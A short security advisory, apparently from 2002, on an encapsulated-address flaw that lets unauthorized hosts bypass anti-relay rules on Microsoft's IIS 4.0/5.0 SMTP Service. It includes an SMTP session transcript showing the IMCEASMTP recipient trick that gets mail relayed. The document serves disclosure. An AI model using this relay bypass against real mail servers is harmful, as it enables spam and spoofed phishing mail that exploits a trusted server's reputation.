‘IIS Microsoft SMTP Service Encapsulated SMTP Address Vulnerability’

Summary

‘Laurent Frinking of Quark Deutschland GmbH originally discovered this vulnerability. At that time, the discovery concerned all versions of Microsoft Exchange 5.5 prior to SP2 with the SP2 IMC patch.

Portcullis has discovered that the Microsoft SMTP Service available with IIS 4.0 and IIS 5.0 is also vulnerable to the encapsulated SMTP address vulnerability even with anti-relaying features enabled. This vulnerability allows hosts that are not authorized to relay e-mail via the SMTP server to bypass the anti-relay features and send mail to foreign domains.’

Credit:

‘The information has been provided by TLR.’


Details

Impact:
The anti-relay rules will be circumvented allowing spam and spoofed mail to be relayed via the SMTP mail server.

Spam Mail:
If the Microsoft IIS SMTP Server is used to relay spam mail this could result in the mail server being black holed causing disruption to the service.

Spoofed e-mail:
As the Microsoft IIS SMTP Service is most often utilized in conjunction with IIS for commercial use this flaw could be used in order to engineer customers particularly because spoofed e-mail relayed in this way will show the trusted web server in the SMTP header.

Exploit:
220 test-mailer Microsoft ESMTP MAIL Service, Version: 5.0.2195.4905 ready at Tue, 28 May 2002 14:54:10 +0100
helo
250 test-mailer Hello [IP address of source host]
MAIL FROM: test@test.com
250 2.1.0 test@test.com….Sender OK
RCPT TO: test2@test.com
550 5.7.1 Unable to relay for test@test.com
RCPT TO: IMCEASMTP-test+40test+2Ecom@victim.co.uk
250 2.1.5 IMCEASMTP-test+40test+2Ecom@victim.co.uk
data
354 Start mail input; end with <CRLF>.<CRLF>
Subject: You are vulnerable.

Categories: Windows